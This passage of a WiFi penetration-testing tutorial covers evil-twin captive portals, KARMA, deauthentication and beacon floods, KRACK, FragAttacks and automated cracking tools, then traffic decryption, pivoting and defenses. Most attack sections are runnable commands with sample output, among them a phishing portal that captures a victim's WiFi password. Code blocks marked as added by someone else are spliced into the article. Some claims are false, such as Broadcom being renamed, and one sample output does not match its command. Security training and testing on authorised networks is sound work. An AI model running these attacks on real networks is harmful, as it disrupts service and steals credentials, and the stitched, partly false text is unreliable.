```
With KARMA, you don’t target a specific network. You become whatever network the client is looking for. Once they connect, you’re the gateway. MITM, credential capture, DNS hijacking, everything is on the table.
Evil Twin with captive portal
When WPA2 cracking fails (strong password, no WPS), the captive portal approach often succeeds. You create a rogue AP with the same SSID, deauth clients from the real AP, and when they connect to yours, present a fake login page that captures the WiFi password.
```console
# wifiphisher automates this entire flow
sudo wifiphisher -aI wlan0mon -eI wlan1 -p firmware-upgrade
[*] Starting Wifiphisher 1.4GIT
[+] Selecting wlan0mon as the deauth interface and wlan1 as the rogue AP interface
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting firmware-upgrade scenario
[*] Starting the fake AP (ESSID: HomeNetwork) on channel 6
[*] Deauthenticating clients from target AP...
[+] Victim 11:22:33:44:55:01 connected to rogue AP
[+] Victim requested captive portal page
[+] POST request with WPA password: sunshine2024
```
The victim sees what looks like a router firmware upgrade page asking them to re-enter their WiFi password. Social engineering, but it works frighteningly well.
Deauthentication and disassociation flood
Pure denial of service. Deauth frames in 802.11 are unencrypted and unauthenticated (pre-802.11w). Any device can send them.
```shell
# Deauth all clients from all APs on a channel
sudo mdk4 wlan0mon d

# Target a specific AP
sudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:01

# Target a specific client
sudo mdk4 wlan0mon d -S 11:22:33:44:55:01
```
802.11w (Management Frame Protection / PMF) was designed to fix this by cryptographically protecting management frames, so a deauth that was not sent by the real AP or client is discarded. It’s mandatory in WPA3 but optional (and rarely enabled) in WPA2. If PMF is enabled, deauth attacks don’t work.
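Where PMF is not yet deployed, the flood itself is easy to spot: a genuine AP sends a handful of deauths, never dozens per second. The detector below is an added example, not part of the article; it runs over constructed records whose field order is an assumption of this demo rather than tshark's default output.

```python
# Added example: flag deauthentication/disassociation floods in a stream of
# management-frame records. Records and the sample capture are constructed.
from collections import defaultdict


def build_sample_lines():
    """Constructed capture, one record per line: 'epoch src dst subtype reason'."""
    lines = []
    # 64 deauths sent in the BSSID's name within ~0.6 s, the same burst size
    # aireplay-ng reports in the WPA2 section above
    for i in range(64):
        lines.append(f"{1778076918.0 + i * 0.01:.3f} aa:bb:cc:dd:ee:01 11:22:33:44:55:01 deauth 7")
    # one legitimate, isolated deauth from another AP (reason 4: inactivity)
    lines.append("1778076920.500 aa:bb:cc:dd:ee:02 11:22:33:44:55:02 deauth 4")
    # a data frame, which the detector ignores
    lines.append("1778076921.000 11:22:33:44:55:03 aa:bb:cc:dd:ee:04 data 0")
    return lines


def parse_record(line):
    ts, src, dst, subtype, reason = line.split()
    return float(ts), src.lower(), dst.lower(), subtype.lower(), int(reason)


def detect_deauth_flood(lines, window_seconds=1.0, threshold=10):
    """Return [(claimed_source_mac, peak_count)] for every source whose
    deauth/disassoc frames reach `threshold` inside any `window_seconds`
    sliding window.

    Deauth frames are spoofable pre-802.11w, so the source MAC names the
    BSSID (or client) being impersonated, not the attacker's adapter. The
    signal is the rate, not the address.
    """
    times_by_src = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, _dst, subtype, _reason = parse_record(line)
        if subtype in ("deauth", "disassoc"):
            times_by_src[src].append(ts)

    alerts = []
    for src, times in times_by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # shrink the window from the left until it spans <= window_seconds
            while t - times[start] > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((src, peak))
    return alerts


if __name__ == "__main__":
    for src, peak in detect_deauth_flood(build_sample_lines()):
        print(f"deauth flood: {peak} frames in one window claiming to come from {src}")
```

A wireless IDS applies the same rate logic per channel; the single reason-4 deauth from the second AP stays below threshold and is left alone.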
Beacon flood
Create thousands of fake access points to confuse clients and make the WiFi environment unusable.
```shell
sudo mdk4 wlan0mon b -f ssid_list.txt -c 6
```
Where ssid_list.txt contains one SSID per line. mdk4 will broadcast beacons for all of them simultaneously. On a phone scanning for WiFi, the user will see hundreds of networks appear.
Advanced techniques
These are the techniques that come from academic research, BlackHat presentations, and tools that most people don’t know exist.
KRACK (Key Reinstallation Attacks)
Published by Mathy Vanhoef at CCS 2017 and presented at BlackHat Europe 2017. KRACK exploits a flaw in the WPA2 4-way handshake itself. By replaying message 3 of the handshake, an attacker can force the client to reinstall an already-in-use encryption key, resetting the nonce counter. This allows frame decryption and in some cases (Linux/Android with wpa_supplicant 2.4/2.5) an all-zero encryption key.
The attack requires a man-in-the-middle position between the client and AP, achieved through channel-based MITM:
- Clone the target AP on a different channel
- Use a multi-channel MITM tool (krackattack scripts) to forward frames between channels
- Intercept and replay message 3 of the 4-way handshake
- Capture decrypted frames
```shell
# Vanhoef's original scripts
cd krackattack
sudo ./krack-all-zero-tk.py wlan0mon wlan1mon
```
Most devices have been patched, but the patch requires a client-side update. IoT devices, smart TVs, and embedded systems are often not updated. The attack is complex to set up but remains relevant against unpatched devices.
FragAttacks (Fragmentation and Aggregation Attacks)
Also by Vanhoef, presented at USENIX Security 2021. FragAttacks exploit design flaws in the WiFi standard’s frame fragmentation and aggregation mechanisms. The attacks affect every WiFi device ever made (WEP, WPA, WPA2, WPA3).
Three classes of vulnerabilities:
- Aggregation attack: An attacker can flip the “is aggregated” flag on an encrypted frame, causing the receiver to parse the frame as A-MSDU (aggregated) instead of normal. This lets the attacker inject arbitrary network packets.
- Mixed key attack: Some implementations accept fragments encrypted with different keys, allowing the attacker to mix legitimate and malicious fragments.
- Fragment cache attack: Some implementations don’t clear fragment caches when connecting to a new network, allowing fragments from one network to be combined with fragments from another.
Vanhoef’s tool for testing:
```shell
cd fragattacks
sudo ./fragattack.py wlan0mon --ap test-amsdu-injection
```
WiFi Krøøk (CVE-2019-15126)
Discovered by ESET researchers and presented at RSA Conference 2020. After a deauthentication, some Broadcom and Cypress WiFi chipsets transmit buffered frames encrypted with an all-zero session key (TK). An attacker can capture these frames and decrypt them trivially.
The attack is simple:
- Send a deauth frame to the target
- Capture the frames transmitted immediately after (during the disassociation)
- These frames are encrypted with TK=0, so decryption is trivial
The vulnerability was in the chip firmware, not the protocol. Broadcom (now Broadspring) and Cypress patched it, but billions of devices with these chipsets may never receive firmware updates.
Multi-channel MITM (MC-MitM)
The core technique behind several advanced attacks (KRACK, FragAttacks). Instead of being on the same channel as the client and AP, you operate on two channels simultaneously:
- Clone the target AP on a different channel
- Use CSA (Channel Switch Announcement) beacons to force the client to move to your channel
- Forward all frames between the client and the real AP on the other channel
- You’re now a transparent MITM, able to modify, drop, or inject frames
```shell
# Example using Vanhoef's mc-mitm tool
sudo ./mc-mitm.py --target AA:BB:CC:DD:EE:01 --intf wlan0mon --dump
```
This is the foundation for many protocol-level attacks. It’s complex to set up reliably (timing and frame forwarding must be precise), but it gives you full control over the encrypted WiFi traffic.
ACK timing side-channel
Published at WiSec 2023. When you send a frame to a WiFi client, the client responds with an ACK frame after a fixed SIFS (Short Interframe Space) delay. But the processing time before the ACK varies slightly depending on the frame content and the client’s state. By measuring ACK timing with microsecond precision, an attacker can infer information about encrypted frame contents.
This is a research-stage attack. It requires custom hardware (SDR) for precise timing measurements. But it demonstrates that even encrypted WiFi leaks information through timing.
802.11r (Fast BSS Transition) exploitation
802.11r enables fast roaming between APs in enterprise networks. A flaw in the protocol allows an attacker to replay the FT Authentication Response to reinstall the pairwise key, similar to KRACK but targeting the roaming mechanism.
During a wireless assessment of a large enterprise with multiple APs:
# Monitor for FT authentication frames
sudo tshark -i wlan0mon -f "wlan type mgt subtype auth" -Y "wlan.fixed.auth.alg == 2"
If you see FT authentication exchanges, the network uses 802.11r and may be vulnerable if unpatched. The attack vector is the same as KRACK: channel-based MITM and replay of the FT handshake.
Automated tools that chain everything
For engagements where speed matters more than stealth, these tools automate the entire workflow.
wifite2
sudo wifite --kill -i wlan0mon
wifite2 2.7.0
[+] scanning (mon0)...
  NUM  ESSID          CH  ENC   PWR  WPS?  CLIENT
  ---  -----          --  ---   ---  ----  ------
    1  HomeNetwork     6  WPA2  -42  Yes   1
    2  CafeWiFi        1  WPA2  -58  Yes   0
    3  LegacyPrinter   3  WEP   -72  No    1
    4  Neighbor_5G     6  WPA2  -55  No    2
[+] select target(s) (1-4) separated by commas, or 'all': 1
[+] (1/1) starting attack on "HomeNetwork" (AA:BB:CC:DD:EE:01)
[+] trying PMKID attack...
[+] captured PMKID hash
[+] trying WPS Pixie-Dust attack...
[+] WPS Pixie-Dust attack successful!
[+] PIN: 23456789
[+] PSK: sunshine2024
wifite2 tries attacks in order of speed: PMKID first, then Pixie Dust, then WPS brute-force, then handshake capture + dictionary. It’s the script kiddie tool, but it’s also genuinely useful for quickly testing multiple networks during an engagement.
bettercap
sudo bettercap -iface wlan0mon -eval "wifi.recon on"
192.168.1.0/24 > wlan0mon » wifi.recon on
[14:58:01] [sys.log] [inf] wifi scanning started on wlan0mon
wifi.ap AA:BB:CC:DD:EE:01 HomeNetwork -42 dBm ch:6 WPA2
wifi.ap AA:BB:CC:DD:EE:02 CafeWiFi -58 dBm ch:1 WPA2
wifi.client 11:22:33:44:55:01 -> HomeNetwork
bettercap is more flexible than wifite2. It’s interactive, scriptable, and handles both wireless and wired attacks. The wifi module can deauth, capture handshakes, and run KARMA attacks all from one interface.
Post-compromise: what to do with the WiFi password
Once you have the PSK, the engagement isn’t over. Here’s what most people forget to do.
Decrypt captured traffic
If you captured traffic during the engagement (even encrypted), you can now decrypt it offline using the recovered PSK.
# Decrypt with airdecap-ng
airdecap-ng -e "HomeNetwork" -p "sunshine2024" wpa_capture-01.cap
Total number of stations seen 4
Total number of packets read 18241
Number of WPA handshakes 1
Number of plaintext packets 0
Number of decrypted WPA packets 15827
Number of corrupted WPA packets 3
Number of skipped packets 2410
The output file wpa_capture-01-dec.cap contains the decrypted traffic. Open it in Wireshark and you can see HTTP requests, DNS queries, plaintext protocols, and anything that wasn’t additionally encrypted with TLS.
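As an added example (my code, not aircrack-ng's), this is the key derivation airdecap-ng has to perform behind that command: PBKDF2 of the passphrase and SSID into the PMK, the PRF-512 expansion into the PTK, and the KCK check of the handshake MIC that tells you whether a capture can be decrypted with a given PSK at all. The MACs, nonces and EAPOL frame are constructed, not taken from a capture.

```python
# Added example (not from the article, not aircrack-ng code): the WPA2 key
# derivation airdecap-ng performs before it can decrypt a capture. PMK =
# PBKDF2-HMAC-SHA1(PSK, SSID); PTK = PRF-512(PMK, MACs, nonces); the first 16
# PTK bytes (KCK) authenticate the EAPOL-Key MIC. MACs, nonces and the EAPOL
# frame below are constructed, not captured.
import hashlib
import hmac

MIC_OFF = 81  # EAPOL header (4) + Key descriptor fields preceding the Key MIC

def pmk_from_psk(passphrase: str, ssid: str) -> bytes:
    """802.11i Annex H: 4096 PBKDF2-HMAC-SHA1 rounds, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11 PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || i)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                             hashlib.sha1).digest() for i in range(4))[:64]

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor v2 (CCMP): HMAC-SHA1-128 over the frame, MIC field zeroed."""
    zeroed = frame[:MIC_OFF] + b"\x00" * 16 + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def psk_matches(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, msg2):
    """True when the passphrase reproduces the MIC on handshake message 2,
    i.e. the capture can be decrypted with this PSK."""
    pmk = pmk_from_psk(passphrase, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFF:MIC_OFF + 16])

# Constructed sample handshake for the article's "HomeNetwork" example.
AP_MAC, STA_MAC = bytes.fromhex("aabbccddee01"), bytes.fromhex("112233445501")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))

def build_msg2(kck: bytes) -> bytes:
    """Minimal EAPOL-Key message 2: RSN descriptor, key info 0x010a, SNonce."""
    body = (b"\x02\x01\x0a\x00\x10" + b"\x00" * 7 + b"\x01" + SNONCE
            + b"\x00" * 50)  # IV, RSC, ID, MIC placeholder, key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    return frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_OFF + 16:]

def demo():
    pmk = pmk_from_psk("sunshine2024", "HomeNetwork")
    msg2 = build_msg2(ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16])
    args = (AP_MAC, STA_MAC, ANONCE, SNONCE, msg2)
    return (psk_matches("sunshine2024", "HomeNetwork", *args),
            psk_matches("wrongpassword", "HomeNetwork", *args))
```

The PBKDF2 step is what makes a random 20+ character passphrase impractical to recover: every guess costs 4096 HMAC-SHA1 rounds before the MIC can even be checked.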
Connect and pivot
# Re-enable NetworkManager
sudo systemctl start NetworkManager
# Connect to the network
nmcli dev wifi connect "HomeNetwork" password "sunshine2024"
Now you’re on the internal network. ARP scan, port scan, service enumeration, lateral movement. The WiFi password was just the door.
Detection and defense
For network administrators
Wireless IDS/IPS: Deploy Kismet or a commercial WIDS to detect rogue APs, deauth floods, and evil twins. Kismet detects anomalies like multiple APs with the same SSID on different channels or BSSIDs.
# Kismet for passive monitoring
kismet -c wlan0mon
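As an added example (my code, not Kismet's), the two anomaly rules that paragraph describes, run over a constructed list of frame summaries: one SSID beaconed from more than one BSSID or channel, and a burst of deauthentication frames from one transmitter. The record layout and the thresholds are assumptions.

```python
# Added example (not from the article, not Kismet code): the two WIDS rules the
# paragraph describes, run over a constructed list of frame summaries. The
# (ts, kind, transmitter, ssid, channel) layout and thresholds are assumptions.
from collections import defaultdict

DEAUTH_THRESHOLD = 20  # deauth frames from one transmitter per window
WINDOW_SECONDS = 5.0

def find_evil_twins(frames, trusted=frozenset()):
    """SSIDs beaconed from more than one (BSSID, channel) pair where at least
    one BSSID is not on the administrator's trusted list."""
    seen = defaultdict(set)
    for _ts, kind, src, ssid, ch in frames:
        if kind == "beacon" and ssid:
            seen[ssid].add((src, ch))
    return {ssid: sorted(pairs) for ssid, pairs in seen.items()
            if len(pairs) > 1 and any(src not in trusted for src, _ in pairs)}

def find_deauth_floods(frames):
    """Peak number of deauth frames per transmitter in any WINDOW_SECONDS
    sliding window; a PMF-only network should never trip this."""
    by_src = defaultdict(list)
    for ts, kind, src, _ssid, _ch in frames:
        if kind == "deauth":
            by_src[src].append(ts)
    alerts = {}
    for src, times in by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > WINDOW_SECONDS:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= DEAUTH_THRESHOLD:
            alerts[src] = peak
    return alerts

# Constructed sample: the real HomeNetwork AP on channel 6, a clone of its SSID
# on channel 11, and a deauth burst forged with the real AP's address.
SAMPLE = (
    [(0.1 * i, "beacon", "AA:BB:CC:DD:EE:01", "HomeNetwork", 6) for i in range(30)]
    + [(0.1 * i, "beacon", "AA:BB:CC:DD:EE:02", "CafeWiFi", 1) for i in range(30)]
    + [(1.0 + 0.1 * i, "beacon", "02:00:00:00:00:01", "HomeNetwork", 11) for i in range(10)]
    + [(2.0 + 0.05 * i, "deauth", "AA:BB:CC:DD:EE:01", "", 6) for i in range(25)]
    + [(2.5, "deauth", "AA:BB:CC:DD:EE:02", "", 1)]  # one ordinary deauth
)
```

Note that the flood is attributed to the real AP's BSSID because deauth frames carry whatever source address the sender chooses, which is exactly why the rule counts per transmitter rather than trusting the address.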
802.11w (PMF): Enable Management Frame Protection. This encrypts deauth and disassociation frames, making deauth attacks impossible. On WPA2, it’s optional. On WPA3, it’s mandatory.
Disable WPS: There is no reason to have WPS enabled on any network in 2026. Disable it in the router admin panel and verify with wash that it’s actually off (some routers advertise WPS even when “disabled” in the UI).
WPA3-only mode: If all your clients support it, disable WPA2 transition mode. This eliminates the downgrade attack path.
802.1X with certificate pinning: For enterprise networks, deploy EAP-TLS (certificate-based authentication) instead of PEAP/MSCHAPv2. If EAP-TLS isn’t feasible, at least pin the RADIUS certificate via GPO on Windows and MDM on mobile devices.
Network segmentation: Even if someone cracks the WiFi, they should land in a restricted VLAN with no access to critical infrastructure. WiFi should be treated as an untrusted network.
Strong PSK: If you’re using WPA2-PSK, use a truly random passphrase of 20+ characters. WPA2 supports up to 63 characters. A random 20-character passphrase is not crackable with current GPU technology.
# Generate a strong PSK
openssl rand -base64 24
K7mR2pLx9Nf4QhW3vY6j8bTc
For users
- Disable auto-connect to open networks
- Forget networks you no longer use (reduces probe request leakage)
- Use a VPN on public WiFi (the captive portal attack still gives the attacker your WiFi password, but at least your traffic is encrypted)
- Check for PMF support: on your router admin page, look for “Protected Management Frames” or “802.11w” and enable it
- Disable WPS. Find the setting and turn it off. Then verify it’s actually off
Conclusion
WiFi security has improved dramatically from WEP to WPA3. But the attack surface hasn’t shrunk. It shifted. WEP was a protocol failure. WPA2 is a password strength problem. WPA3 is a transition mode problem. And the protocol-agnostic attacks (deauth, evil twin, KARMA) work against all of them because 802.11 management frames remain unprotected on most networks.
The realistic attack path in 2026 is: check WPS first (Pixie Dust takes seconds), try PMKID (no interaction needed), capture a handshake if needed (deauth one client), crack offline with hashcat and rules. If all that fails, evil twin with captive portal. If the network is WPA2-Enterprise, evil twin with hostapd-wpe and crack MSCHAPv2.
WPA3-only with PMF enabled and no WPS is currently the strongest configuration available for consumer networks. For enterprise, EAP-TLS with certificate pinning and a WIDS. Everything else is buying time.
Be careful. Intercepting or disrupting wireless communications that you don’t own or have explicit authorization to test is illegal in most jurisdictions. In the US, it falls under the Computer Fraud and Abuse Act (18 U.S.C. 1030) and the Wiretap Act (18 U.S.C. 2511). In the EU, the Directive on Attacks against Information Systems (2013/40/EU) applies. Deauthentication attacks are explicitly illegal even if you don’t capture any data, because they constitute intentional disruption of a communication service. Everything described in this article should only be performed on networks you own or have explicit written authorization to test.